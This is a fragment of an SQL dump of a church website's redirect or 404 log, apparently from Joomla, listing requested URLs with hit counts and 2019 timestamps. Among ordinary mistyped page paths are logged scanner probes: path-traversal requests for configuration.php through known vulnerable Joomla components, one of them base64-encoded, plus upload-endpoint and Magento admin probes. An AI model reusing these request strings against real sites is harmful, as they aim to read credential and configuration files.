(10764, 'https://mail.lifeoasisinternationalchurch.org/partnership/form/', NULL, '', '', 2, 0, '2019-06-15 06:23:12', '0000-00-00 00:00:00', 301),
(10765, 'https://142.4.21.132/nmaplowercheck1560585761', NULL, '', '', 1, 0, '2019-06-15 08:02:41', '0000-00-00 00:00:00', 301),
(10766, 'https://lifeoasisinternationalchurch.org/xxxxxx.php', NULL, '', '', 4, 0, '2019-06-15 13:03:19', '0000-00-00 00:00:00', 301),
(10767, 'https://eagle.lifeoasisinternationalchurch.org/admin/login.php', NULL, '', '', 1, 0, '2019-06-15 17:29:26', '0000-00-00 00:00:00', 301),
(10768, 'https://eagle.lifeoasisinternationalchurch.org/index.php?option=com_adsmanager&task=upload&tmpl=component', NULL, '', '', 1, 0, '2019-06-15 17:29:34', '0000-00-00 00:00:00', 301),
(10769, 'https://eagle.lifeoasisinternationalchurch.org/administrator/components/com_alberghi/upload.alberghi.php', NULL, '', '', 1, 0, '2019-06-15 17:29:35', '0000-00-00 00:00:00', 301),
(10770, 'https://eagle.lifeoasisinternationalchurch.org/index.php?option=com_cckjseblod&task=download&file=configuration.php', NULL, '', '', 1, 0, '2019-06-15 17:29:37', '0000-00-00 00:00:00', 301),
(10771, 'https://eagle.lifeoasisinternationalchurch.org/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=', NULL, '', '', 1, 0, '2019-06-15 17:29:39', '0000-00-00 00:00:00', 301),
(10772, 'https://eagle.lifeoasisinternationalchurch.org/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php', NULL, '', '', 1, 0, '2019-06-15 17:29:40', '0000-00-00 00:00:00', 301),
(10773, 'https://eagle.lifeoasisinternationalchurch.org/index.php?option=com_jdownloads&itemid=0&view=upload', NULL, '', '', 2, 0, '2019-06-15 17:29:42', '0000-00-00 00:00:00', 301),
(10774, 'https://eagle.lifeoasisinternationalchurch.org/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php', NULL, '', '', 1, 0, '2019-06-15 17:29:45', '0000-00-00 00:00:00', 301),
(10775, 'https://eagle.lifeoasisinternationalchurch.org/index.php?option=com_myblog&task=ajaxupload', NULL, '', '', 1, 0, '2019-06-15 17:29:46', '0000-00-00 00:00:00', 301),
(10776, 'https://eagle.lifeoasisinternationalchurch.org/index.php?option=com_macgallery&view=download&albumid=../../configuration.php', NULL, '', '', 1, 0, '2019-06-15 17:29:49', '0000-00-00 00:00:00', 301),
(10777, 'https://eagle.lifeoasisinternationalchurch.org/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=', NULL, '', '', 1, 0, '2019-06-15 17:29:55', '0000-00-00 00:00:00', 301),
(10778, 'https://lifeoasisinternationalchurch.org/magento/errors/503.php', NULL, '', '', 18, 0, '2019-06-17 15:42:15', '0000-00-00 00:00:00', 301),
(10779, 'https://lifeoasisinternationalchurch.org/store/errors/503.php', NULL, '', '', 18, 0, '2019-06-17 15:42:31', '0000-00-00 00:00:00', 301),
(10780, 'https://lifeoasisinternationalchurch.org/shop/errors/503.php', NULL, '', '', 17, 0, '2019-06-17 15:42:34', '0000-00-00 00:00:00', 301),
(10781, 'https://lifeoasisinternationalchurch.org/blackhat.php', NULL, '', '', 1, 0, '2019-06-17 20:40:48', '0000-00-00 00:00:00', 301),
(10782, 'https://lifeoasisinternationalchurch.org/lifeoasis/', NULL, '', '', 1, 0, '2019-06-18 11:38:38', '0000-00-00 00:00:00', 301),
(10783, 'https://www.lifeoasisinternationalchurch.org/resources/radio', NULL, '', '', 1, 0, '2019-06-19 16:08:14', '0000-00-00 00:00:00', 301),
(10784, 'https://lifeoasisinternationalchurch.org/anwc2019', NULL, '', '', 2, 0, '2019-06-19 22:15:17', '0000-00-00 00:00:00', 301),
(10785, 'https://eagle.lifeoasisinternationalchurch.org/store/index.php/admin/', NULL, '', '', 1, 0, '2019-06-20 10:32:53', '0000-00-00 00:00:00', 301),
(10786, 'https://eagle.lifeoasisinternationalchurch.org/store/downloader/index.php', NULL, '', '', 2, 0, '2019-06-20 10:32:55', '0000-00-00 00:00:00', 301),
(10787, 'https://eagle.lifeoasisinternationalchurch.org/store/errors/503.php', NULL, '', '', 1, 0, '2019-06-20 10:33:08', '0000-00-00 00:00:00', 301),
(10788, 'https://eagle.lifeoasisinternationalchurch.org/magento/index.php/admin/', NULL, '', '', 1, 0, '2019-06-20 10:33:11', '0000-00-00 00:00:00', 301),
(10789, 'https://eagle.lifeoasisinternationalchurch.org/magento/downloader/index.php', NULL, '', '', 1, 0, '2019-06-20 10:33:12', '0000-00-00 00:00:00', 301),
(10790, 'https://eagle.lifeoasisinternationalchurch.org/magento/errors/503.php', NULL, '', '', 1, 0, '2019-06-20 10:33:13', '0000-00-00 00:00:00', 301),
(10791, 'https://eagle.lifeoasisinternationalchurch.org/shop/downloader/index.php', NULL, '', '', 1, 0, '2019-06-20 10:33:29', '0000-00-00 00:00:00', 301),
(10792, 'https://eagle.lifeoasisinternationalchurch.org/shop/errors/503.php', NULL, '', '', 1, 0, '2019-06-20 10:33:31', '0000-00-00 00:00:00', 301),
(10793, 'https://eagle.lifeoasisinternationalchurch.org/index.php/admin/', NULL, '', '', 1, 0, '2019-06-20 10:33:32', '0000-00-00 00:00:00', 301),
(10794, 'https://eagle.lifeoasisinternationalchurch.org/downloader/index.php', NULL, '', '', 1, 0, '2019-06-20 10:33:34', '0000-00-00 00:00:00', 301),
(10795, 'https://eagle.lifeoasisinternationalchurch.org/errors/503.php', NULL, '', '', 1, 0, '2019-06-20 10:33:44', '0000-00-00 00:00:00', 301),
(10796, 'https://www.lifeoasisinternationalchurch.org/jobs', NULL, '', '', 1, 0, '2019-06-21 03:53:20', '0000-00-00 00:00:00', 301),
(10797, 'https://www.lifeoasisinternationalchurch.org/gobc 2019', NULL, '', '', 7, 0, '2019-06-21 07:46:53', '0000-00-00 00:00:00', 301),
(10798, 'https://lifeoasisinternationalchurch.org/gobc2019workshops', NULL, '', '', 1, 0, '2019-06-22 00:35:06', '0000-00-00 00:00:00', 301),
(10799, 'https://lifeoasisinternationalchurch.org/gobc2019workshop/', NULL, '', '', 1, 0, '2019-06-22 05:33:33', '0000-00-00 00:00:00', 301),
(10800, 'https://www.lifeoasisinternationalchurch.org/adminustrator', NULL, '', '', 1, 0, '2019-06-23 07:49:13', '0000-00-00 00:00:00', 301),
(10801, 'https://lifeoasisinternationalchurch.org/gobcworkshop', NULL, '', '', 1, 0, '2019-06-23 08:40:52', '0000-00-00 00:00:00', 301),
(10802, 'https://www.lifeoasisinternationalchurch.org/streaminghttps://www.lifeoasisinternationalchurch.org/streaming', NULL, '', '', 1, 0, '2019-06-23 09:06:22', '0000-00-00 00:00:00', 301),
(10803, 'https://142.4.21.132/lists/admin.php', NULL, '', '', 2, 0, '2019-06-23 10:37:07', '0000-00-00 00:00:00', 301),
(10804, 'https://142.4.21.132/admin.php', NULL, '', '', 2, 0, '2019-06-23 10:37:07', '0000-00-00 00:00:00', 301),
(10805, 'https://lifeoasisinternationalchurch.org/gobcworkshop/', NULL, '', '', 1, 0, '2019-06-23 11:08:42', '0000-00-00 00:00:00', 301),
(10806, 'https://lifeoasisinternationalchurch.org/workshop', NULL, '', '', 1, 0, '2019-06-23 11:21:14', '0000-00-00 00:00:00', 301),
(10807, 'https://lifeoasisinternationalchurch.org/resources/live-privatestreaming', NULL, '', '', 1, 0, '2019-06-23 11:42:03', '0000-00-00 00:00:00', 301),
(10808, 'https://lifeoasisinternationalchurch.org/gobc019/workshop/', NULL, '', '', 3, 0, '2019-06-23 11:53:45', '0000-00-00 00:00:00', 301),
(10809, 'https://default/index.html', NULL, '', '', 2, 0, '2019-06-23 20:30:24', '0000-00-00 00:00:00', 301),
(10810, 'https://mail.lifeoasisinternationalchurch.org/shop/downloader/index.php', NULL, '', '', 1, 0, '2019-06-23 22:08:57', '0000-00-00 00:00:00', 301),
(10811, 'https://mail.lifeoasisinternationalchurch.org/shop/errors/503.php', NULL, '', '', 1, 0, '2019-06-23 22:09:03', '0000-00-00 00:00:00', 301),
(10812, 'https://mail.lifeoasisinternationalchurch.org/magento/index.php/admin/', NULL, '', '', 1, 0, '2019-06-23 22:09:04', '0000-00-00 00:00:00', 301),
(10813, 'https://mail.lifeoasisinternationalchurch.org/magento/downloader/index.php', NULL, '', '', 1, 0, '2019-06-23 22:09:05', '0000-00-00 00:00:00', 301),
(10814, 'https://mail.lifeoasisinternationalchurch.org/magento/errors/503.php', NULL, '', '', 1, 0, '2019-06-23 22:09:11', '0000-00-00 00:00:00', 301),
(10815, 'https://mail.lifeoasisinternationalchurch.org/index.php/admin/', NULL, '', '', 1, 0, '2019-06-23 22:09:19', '0000-00-00 00:00:00', 301),
(10816, 'https://mail.lifeoasisinternationalchurch.org/downloader/index.php', NULL, '', '', 1, 0, '2019-06-23 22:09:22', '0000-00-00 00:00:00', 301),
(10817, 'https://mail.lifeoasisinternationalchurch.org/errors/503.php', NULL, '', '', 1, 0, '2019-06-23 22:09:24', '0000-00-00 00:00:00', 301),
(10818, 'https://mail.lifeoasisinternationalchurch.org/store/index.php/admin/', NULL, '', '', 1, 0, '2019-06-23 22:09:26', '0000-00-00 00:00:00', 301),
(10819, 'https://mail.lifeoasisinternationalchurch.org/store/downloader/index.php', NULL, '', '', 1, 0, '2019-06-23 22:09:32', '0000-00-00 00:00:00', 301),
(10820, 'https://mail.lifeoasisinternationalchurch.org/store/errors/503.php', NULL, '', '', 1, 0, '2019-06-23 22:09:33', '0000-00-00 00:00:00', 301),
(10821, 'https://lifeoasisinternationalchurch.org/errors/503.php', NULL, '', '', 1, 0, '2019-06-24 05:55:29', '0000-00-00 00:00:00', 301),
(10822, 'https://lifeoasisinternationalchurch.org/gobc20195', NULL, '', '', 1, 0, '2019-06-24 08:14:27', '0000-00-00 00:00:00', 301),
(10823, 'https://music.lifeoasisinternationalchurch.org/store/index.php/admin/', NULL, '', '', 1, 0, '2019-06-24 14:40:50', '0000-00-00 00:00:00', 301),
(10824, 'https://music.lifeoasisinternationalchurch.org/store/downloader/index.php', NULL, '', '', 1, 0, '2019-06-24 14:40:56', '0000-00-00 00:00:00', 301),
(10825, 'https://music.lifeoasisinternationalchurch.org/store/errors/503.php', NULL, '', '', 1, 0, '2019-06-24 14:40:58', '0000-00-00 00:00:00', 301),
(10826, 'https://music.lifeoasisinternationalchurch.org/index.php/admin/', NULL, '', '', 1, 0, '2019-06-24 14:41:00', '0000-00-00 00:00:00', 301),
(10827, 'https://music.lifeoasisinternationalchurch.org/downloader/index.php', NULL, '', '', 1, 0, '2019-06-24 14:41:01', '0000-00-00 00:00:00', 301),
(10828, 'https://music.lifeoasisinternationalchurch.org/errors/503.php', NULL, '', '', 1, 0, '2019-06-24 14:41:02', '0000-00-00 00:00:00', 301),
(10829, 'https://music.lifeoasisinternationalchurch.org/shop/downloader/index.php', NULL, '', '', 2, 0, '2019-06-24 14:41:13', '0000-00-00 00:00:00', 301),
(10830, 'https://music.lifeoasisinternationalchurch.org/shop/errors/503.php', NULL, '', '', 1, 0, '2019-06-24 14:41:15', '0000-00-00 00:00:00', 301),
(10831, 'https://music.lifeoasisinternationalchurch.org/magento/index.php/admin/', NULL, '', '', 1, 0, '2019-06-24 14:42:18', '0000-00-00 00:00:00', 301),
(10832, 'https://music.lifeoasisinternationalchurch.org/magento/downloader/index.php', NULL, '', '', 1, 0, '2019-06-24 14:42:28', '0000-00-00 00:00:00', 301),
(10833, 'https://music.lifeoasisinternationalchurch.org/magento/errors/503.php', NULL, '', '', 1, 0, '2019-06-24 14:42:35', '0000-00-00 00:00:00', 301),
(10834, 'https://142.4.21.132/api/v1/pod', NULL, '', '', 3, 0, '2019-06-24 15:05:33', '0000-00-00 00:00:00', 301),
(10835, 'https://www.lifeoasisinternationalchurch.org/streamingfor', NULL, '', '', 1, 0, '2019-06-24 15:49:19', '0000-00-00 00:00:00', 301),
(10836, 'https://lifeoasisinternationalchurch.org/streamim', NULL, '', '', 1, 0, '2019-06-25 08:53:01', '0000-00-00 00:00:00', 301),
(10837, 'https://lifeoasisinternationalchurch.org/soar1', NULL, '', '', 2, 0, '2019-06-25 10:23:00', '0000-00-00 00:00:00', 301),
(10838, 'https://www.lifeoasisinternationalchurch.org/workshop', NULL, '', '', 2, 0, '2019-06-26 19:20:02', '0000-00-00 00:00:00', 301),
(10839, 'https://lifeoasisinternationalchurch.org/dump/bigdump.php', NULL, '', '', 1, 0, '2019-06-27 12:57:39', '0000-00-00 00:00:00', 301),
(10840, 'https://lifeoasisinternationalchurch.org/bigdump/bigdump.php', NULL, '', '', 1, 0, '2019-06-27 12:57:40', '0000-00-00 00:00:00', 301),
(10841, 'https://lifeoasisinternationalchurch.org/sql/bigdump.php', NULL, '', '', 1, 0, '2019-06-27 12:57:41', '0000-00-00 00:00:00', 301),
(10842, 'https://lifeoasisinternationalchurch.org/gobc2018workshop', NULL, '', '', 1, 0, '2019-06-27 15:06:05', '0000-00-00 00:00:00', 301),
(10843, 'https://lifeoasisinternationalchurch.org/soar2', NULL, '', '', 2, 0, '2019-06-27 22:45:11', '0000-00-00 00:00:00', 301),
(10844, 'https://lifeoasisinternationalchurch.org/download', NULL, '', '', 2, 0, '2019-06-28 00:32:56', '0000-00-00 00:00:00', 301),
(10845, 'https://lifeoasisinternationalchurch.org/gobc2019workshopt', NULL, '', '', 1, 0, '2019-06-29 07:00:52', '0000-00-00 00:00:00', 301),
(10846, 'https://www.lifeoasisinternationalchurch.org/component/content/article/2-uncategorised/47-videos', NULL, '', '', 2, 0, '2019-06-29 10:11:06', '0000-00-00 00:00:00', 301),
(10847, 'https://www.lifeoasisinternationalchurch.org/loic-forum/14-contact-us', NULL, '', '', 9, 0, '2019-06-29 10:13:10', '0000-00-00 00:00:00', 301),
(10848, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/10-grace-2?layout=popup&tmpl=component', NULL, '', '', 3, 0, '2019-06-29 18:58:29', '0000-00-00 00:00:00', 301),
(10849, 'https://www.lifeoasisinternationalchurch.org/gobc2019registeration', NULL, '', '', 1, 0, '2019-06-30 01:35:36', '0000-00-00 00:00:00', 301),
(10850, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/10-grace-2?layout=popup&tmpl=component', NULL, '', '', 7, 0, '2019-06-30 04:58:41', '0000-00-00 00:00:00', 301),
(10851, 'https://lifeoasisinternationalchurch.org/gobc2019worksop/', NULL, '', '', 4, 0, '2019-06-30 06:39:18', '0000-00-00 00:00:00', 301),
(10852, 'https://lifeoasisinternationalchurch.org/livestreaming/', NULL, '', '', 2, 0, '2019-06-30 08:47:45', '0000-00-00 00:00:00', 301),
(10853, 'https://www.lifeoasisinternationalchurch.org/7-kindom-builder/15-prayer-a-fasting-day-6', NULL, '', '', 6, 0, '2019-06-30 22:14:49', '0000-00-00 00:00:00', 301),
(10854, 'https://www.lifeoasisinternationalchurch.org/sy', NULL, '', '', 1, 0, '2019-07-01 08:01:04', '0000-00-00 00:00:00', 301),
(10855, 'https://www.lifeoasisinternationalchurch.org/syr', NULL, '', '', 1, 0, '2019-07-01 08:01:05', '0000-00-00 00:00:00', 301),
(10856, 'https://www.lifeoasisinternationalchurch.org/syrr', NULL, '', '', 1, 0, '2019-07-01 08:01:05', '0000-00-00 00:00:00', 301),
(10857, 'https://lifeoasisinternationalchurch.org/tithe-offering', NULL, '', '', 2, 0, '2019-07-01 20:39:07', '0000-00-00 00:00:00', 301),
(10858, 'https://lifeoasisinternationalchurch.org/about-us/service-times;;', NULL, 'https://lifeoasisinternationalchurch.org/about-us/service-times;;', '', 1, 0, '2019-07-01 22:00:39', '0000-00-00 00:00:00', 301),
(10859, 'https://www.lifeoasisinternationalchurch.org/template-info/musci/', NULL, '', '', 2, 0, '2019-07-02 05:23:26', '0000-00-00 00:00:00', 301),
(10860, 'https://www.lifeoasisinternationalchurch.org/videos/', NULL, '', '', 2, 0, '2019-07-02 05:23:34', '0000-00-00 00:00:00', 301),
(10861, 'https://lifeoasisinternationalchurch.org/saar2', NULL, '', '', 1, 0, '2019-07-02 18:40:18', '0000-00-00 00:00:00', 301),
(10862, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/index.php?option=com_content&view=article&id=48:wimmp&catid=18:loic&itemid=239', NULL, '', '', 6, 0, '2019-07-02 21:10:31', '0000-00-00 00:00:00', 301),
(10863, 'https://www.lifeoasisinternationalchurch.org/index.php/103-prayerfocus30/', NULL, '', '', 2, 0, '2019-07-03 03:47:00', '0000-00-00 00:00:00', 301),
(10864, 'https://www.lifeoasisinternationalchurch.org/index.php/104-prayerfocus31/', NULL, '', '', 2, 0, '2019-07-03 03:47:03', '0000-00-00 00:00:00', 301),
(10865, 'https://www.lifeoasisinternationalchurch.org/index.php/106-prayer-focus-for-day-32/', NULL, '', '', 2, 0, '2019-07-03 03:47:11', '0000-00-00 00:00:00', 301),
(10866, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/17-prayer-a-fasting-day-1/', NULL, '', '', 2, 0, '2019-07-03 03:47:27', '0000-00-00 00:00:00', 301),
(10867, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/18-prayer-a-fasting-day-10/', NULL, '', '', 2, 0, '2019-07-03 03:47:31', '0000-00-00 00:00:00', 301),
(10868, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/19-prayer-a-fasting-day-11/', NULL, '', '', 2, 0, '2019-07-03 03:47:34', '0000-00-00 00:00:00', 301),
(10869, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/20-prayer-a-fasting-day-12/', NULL, '', '', 2, 0, '2019-07-03 03:47:38', '0000-00-00 00:00:00', 301),
(10870, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/21-prophetic-words-for-day-13/', NULL, '', '', 2, 0, '2019-07-03 03:47:42', '0000-00-00 00:00:00', 301),
(10871, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/22-prophetic-words-for-day-14/', NULL, '', '', 2, 0, '2019-07-03 03:47:45', '0000-00-00 00:00:00', 301),
(10872, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/30-prophetic-words-for-day-21/', NULL, '', '', 2, 0, '2019-07-03 03:48:18', '0000-00-00 00:00:00', 301),
(10873, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/33-prayer-a-fasting-day-24/', NULL, '', '', 2, 0, '2019-07-03 03:48:30', '0000-00-00 00:00:00', 301),
(10874, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/34-prayer-a-fasting-day-25/', NULL, '', '', 2, 0, '2019-07-03 03:48:34', '0000-00-00 00:00:00', 301),
(10875, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/35-prayer-a-fasting-day-26/', NULL, '', '', 2, 0, '2019-07-03 03:48:37', '0000-00-00 00:00:00', 301),
(10876, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/36-prayer-a-fasting-day-27/', NULL, '', '', 2, 0, '2019-07-03 03:48:41', '0000-00-00 00:00:00', 301),
(10877, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/41-prayer-a-fasting-day-30/', NULL, '', '', 2, 0, '2019-07-03 03:48:58', '0000-00-00 00:00:00', 301),
(10878, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/44-prayer-a-fasting-day-33/', NULL, '', '', 2, 0, '2019-07-03 03:49:12', '0000-00-00 00:00:00', 301),
(10879, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/47-prayer-a-fasting-day-36/', NULL, '', '', 2, 0, '2019-07-03 03:49:26', '0000-00-00 00:00:00', 301),
(10880, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/48-prayer-a-fasting-day-37/', NULL, '', '', 2, 0, '2019-07-03 03:49:30', '0000-00-00 00:00:00', 301),
(10881, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/49-prayer-a-fasting-day-38/', NULL, '', '', 2, 0, '2019-07-03 03:49:34', '0000-00-00 00:00:00', 301),
(10882, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/51-prophetic-words-for-day-39/', NULL, '', '', 2, 0, '2019-07-03 03:49:38', '0000-00-00 00:00:00', 301),
(10883, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/52-prayer-a-fasting-day-4/', NULL, '', '', 2, 0, '2019-07-03 03:49:43', '0000-00-00 00:00:00', 301),
(10884, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/53-prayer-a-fasting-day-40/', NULL, '', '', 2, 0, '2019-07-03 03:49:48', '0000-00-00 00:00:00', 301),
(10885, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/54-prayer-a-fasting-day-5/', NULL, '', '', 2, 0, '2019-07-03 03:49:53', '0000-00-00 00:00:00', 301),
(10886, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/55-prayer-a-fasting-day-6/', NULL, '', '', 2, 0, '2019-07-03 03:49:57', '0000-00-00 00:00:00', 301),
(10887, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/56-prayer-a-fasting-day-7/', NULL, '', '', 2, 0, '2019-07-03 03:50:02', '0000-00-00 00:00:00', 301),
(10888, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/57-prayer-a-fasting-day-8/', NULL, '', '', 2, 0, '2019-07-03 03:50:06', '0000-00-00 00:00:00', 301),
(10889, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/58-prayer-a-fasting-day/', NULL, '', '', 2, 0, '2019-07-03 03:50:11', '0000-00-00 00:00:00', 301),
(10890, 'https://www.lifeoasisinternationalchurch.org/index.php/127-prayer-focus-for-day-5/', NULL, '', '', 2, 0, '2019-07-03 03:51:50', '0000-00-00 00:00:00', 301),
(10891, 'https://www.lifeoasisinternationalchurch.org/index.php/128-2014-6/', NULL, '', '', 2, 0, '2019-07-03 03:51:56', '0000-00-00 00:00:00', 301),
(10892, 'https://www.lifeoasisinternationalchurch.org/index.php/13-2014fasting-prayer/174-prayer-focus-for-day-12/', NULL, '', '', 2, 0, '2019-07-03 03:52:06', '0000-00-00 00:00:00', 301),
(10893, 'https://www.lifeoasisinternationalchurch.org/index.php/13-2014fasting-prayer/175-day72014/', NULL, '', '', 2, 0, '2019-07-03 03:52:12', '0000-00-00 00:00:00', 301),
(10894, 'https://www.lifeoasisinternationalchurch.org/index.php/131-20148/', NULL, '', '', 2, 0, '2019-07-03 03:52:27', '0000-00-00 00:00:00', 301),
(10895, 'https://www.lifeoasisinternationalchurch.org/index.php/132-prayer-focus-for-day-8/', NULL, '', '', 2, 0, '2019-07-03 03:52:34', '0000-00-00 00:00:00', 301),
(10896, 'https://www.lifeoasisinternationalchurch.org/index.php/133-2014-8/', NULL, '', '', 2, 0, '2019-07-03 03:52:42', '0000-00-00 00:00:00', 301),
(10897, 'https://www.lifeoasisinternationalchurch.org/index.php/134-prayer-focus-for-day-9/', NULL, '', '', 2, 0, '2019-07-03 03:52:50', '0000-00-00 00:00:00', 301),
(10898, 'https://www.lifeoasisinternationalchurch.org/index.php/135-day1/', NULL, '', '', 2, 0, '2019-07-03 03:52:57', '0000-00-00 00:00:00', 301),
(10899, 'https://www.lifeoasisinternationalchurch.org/index.php/137-day-11/', NULL, '', '', 2, 0, '2019-07-03 03:53:05', '0000-00-00 00:00:00', 301),
(10900, 'https://www.lifeoasisinternationalchurch.org/index.php/138-day-12/', NULL, '', '', 2, 0, '2019-07-03 03:53:12', '0000-00-00 00:00:00', 301),
(10901, 'https://www.lifeoasisinternationalchurch.org/index.php/139-day-13/', NULL, '', '', 2, 0, '2019-07-03 03:53:19', '0000-00-00 00:00:00', 301),
(10902, 'https://www.lifeoasisinternationalchurch.org/index.php/140-day-14/', NULL, '', '', 2, 0, '2019-07-03 03:53:27', '0000-00-00 00:00:00', 301),
(10903, 'https://www.lifeoasisinternationalchurch.org/index.php/141-day-15/', NULL, '', '', 2, 0, '2019-07-03 03:53:34', '0000-00-00 00:00:00', 301),
(10904, 'https://www.lifeoasisinternationalchurch.org/index.php/142-day-16/', NULL, '', '', 2, 0, '2019-07-03 03:53:40', '0000-00-00 00:00:00', 301),
(10905, 'https://www.lifeoasisinternationalchurch.org/index.php/143-day-17/', NULL, '', '', 2, 0, '2019-07-03 03:53:47', '0000-00-00 00:00:00', 301),
(10906, 'https://www.lifeoasisinternationalchurch.org/index.php/144-day-18/', NULL, '', '', 2, 0, '2019-07-03 03:53:55', '0000-00-00 00:00:00', 301),
(10907, 'https://www.lifeoasisinternationalchurch.org/index.php/145-day-19/', NULL, '', '', 2, 0, '2019-07-03 03:54:03', '0000-00-00 00:00:00', 301),
(10908, 'https://www.lifeoasisinternationalchurch.org/index.php/146-day2/', NULL, '', '', 2, 0, '2019-07-03 03:54:09', '0000-00-00 00:00:00', 301),
(10909, 'https://www.lifeoasisinternationalchurch.org/index.php/147-day-20/', NULL, '', '', 2, 0, '2019-07-03 03:54:17', '0000-00-00 00:00:00', 301),
(10910, 'https://www.lifeoasisinternationalchurch.org/index.php/148-day-21/', NULL, '', '', 2, 0, '2019-07-03 03:54:23', '0000-00-00 00:00:00', 301),
(10911, 'https://www.lifeoasisinternationalchurch.org/index.php/149-day-22/', NULL, '', '', 2, 0, '2019-07-03 03:54:28', '0000-00-00 00:00:00', 301),
(10912, 'https://www.lifeoasisinternationalchurch.org/index.php/150-day-23/', NULL, '', '', 2, 0, '2019-07-03 03:54:35', '0000-00-00 00:00:00', 301),
(10913, 'https://www.lifeoasisinternationalchurch.org/index.php/151-day-24/', NULL, '', '', 2, 0, '2019-07-03 03:54:44', '0000-00-00 00:00:00', 301),
(10914, 'https://www.lifeoasisinternationalchurch.org/index.php/152-day-25/', NULL, '', '', 2, 0, '2019-07-03 03:54:52', '0000-00-00 00:00:00', 301),
(10915, 'https://www.lifeoasisinternationalchurch.org/index.php/153-day-26/', NULL, '', '', 2, 0, '2019-07-03 03:54:59', '0000-00-00 00:00:00', 301),
(10916, 'https://www.lifeoasisinternationalchurch.org/index.php/154-day-27/', NULL, '', '', 2, 0, '2019-07-03 03:55:07', '0000-00-00 00:00:00', 301),
(10917, 'https://www.lifeoasisinternationalchurch.org/index.php/155-day-28/', NULL, '', '', 2, 0, '2019-07-03 03:55:14', '0000-00-00 00:00:00', 301),
(10918, 'https://www.lifeoasisinternationalchurch.org/index.php/157-day3/', NULL, '', '', 2, 0, '2019-07-03 03:55:22', '0000-00-00 00:00:00', 301),
(10919, 'https://www.lifeoasisinternationalchurch.org/index.php/158-day-30/', NULL, '', '', 2, 0, '2019-07-03 03:55:28', '0000-00-00 00:00:00', 301),
(10920, 'https://www.lifeoasisinternationalchurch.org/index.php/159-day-31/', NULL, '', '', 2, 0, '2019-07-03 03:55:37', '0000-00-00 00:00:00', 301),
(10921, 'https://www.lifeoasisinternationalchurch.org/index.php/160-day-32/', NULL, '', '', 2, 0, '2019-07-03 03:55:43', '0000-00-00 00:00:00', 301),
(10922, 'https://www.lifeoasisinternationalchurch.org/index.php/161-day-33/', NULL, '', '', 2, 0, '2019-07-03 03:55:52', '0000-00-00 00:00:00', 301),
(10923, 'https://www.lifeoasisinternationalchurch.org/index.php/162-day-34/', NULL, '', '', 2, 0, '2019-07-03 03:56:00', '0000-00-00 00:00:00', 301),
(10924, 'https://www.lifeoasisinternationalchurch.org/index.php/163-day-35/', NULL, '', '', 2, 0, '2019-07-03 03:56:08', '0000-00-00 00:00:00', 301),
(10925, 'https://www.lifeoasisinternationalchurch.org/index.php/167-day-39/', NULL, '', '', 2, 0, '2019-07-03 03:56:16', '0000-00-00 00:00:00', 301),
(10926, 'https://www.lifeoasisinternationalchurch.org/index.php/168-prophetic-words-for-day-4/', NULL, '', '', 2, 0, '2019-07-03 03:56:23', '0000-00-00 00:00:00', 301),
(10927, 'https://www.lifeoasisinternationalchurch.org/index.php/169-prophetic-words-for-day-5/', NULL, '', '', 2, 0, '2019-07-03 03:56:31', '0000-00-00 00:00:00', 301),
(10928, 'https://www.lifeoasisinternationalchurch.org/index.php/170-prophetic-words-for-day-6/', NULL, '', '', 2, 0, '2019-07-03 03:56:37', '0000-00-00 00:00:00', 301),
(10929, 'https://www.lifeoasisinternationalchurch.org/index.php/171-prophetic-words-for-day-7/', NULL, '', '', 2, 0, '2019-07-03 03:56:46', '0000-00-00 00:00:00', 301),
(10930, 'https://www.lifeoasisinternationalchurch.org/index.php/172-day8/', NULL, '', '', 2, 0, '2019-07-03 03:56:54', '0000-00-00 00:00:00', 301),
(10931, 'https://www.lifeoasisinternationalchurch.org/index.php/173-day-9/', NULL, '', '', 2, 0, '2019-07-03 03:57:01', '0000-00-00 00:00:00', 301),
(10932, 'https://www.lifeoasisinternationalchurch.org/index.php/178-2015-day-2/', NULL, '', '', 2, 0, '2019-07-03 03:57:09', '0000-00-00 00:00:00', 301),
(10933, 'https://www.lifeoasisinternationalchurch.org/index.php/179-2015-day-3/', NULL, '', '', 2, 0, '2019-07-03 03:57:15', '0000-00-00 00:00:00', 301),
(10934, 'https://www.lifeoasisinternationalchurch.org/index.php/180-2015-day-4/', NULL, '', '', 2, 0, '2019-07-03 03:57:21', '0000-00-00 00:00:00', 301),
(10935, 'https://www.lifeoasisinternationalchurch.org/index.php/181-2015-day-5/', NULL, '', '', 2, 0, '2019-07-03 03:57:29', '0000-00-00 00:00:00', 301),
(10936, 'https://www.lifeoasisinternationalchurch.org/index.php/182-2015-day-6/', NULL, '', '', 2, 0, '2019-07-03 03:57:35', '0000-00-00 00:00:00', 301),
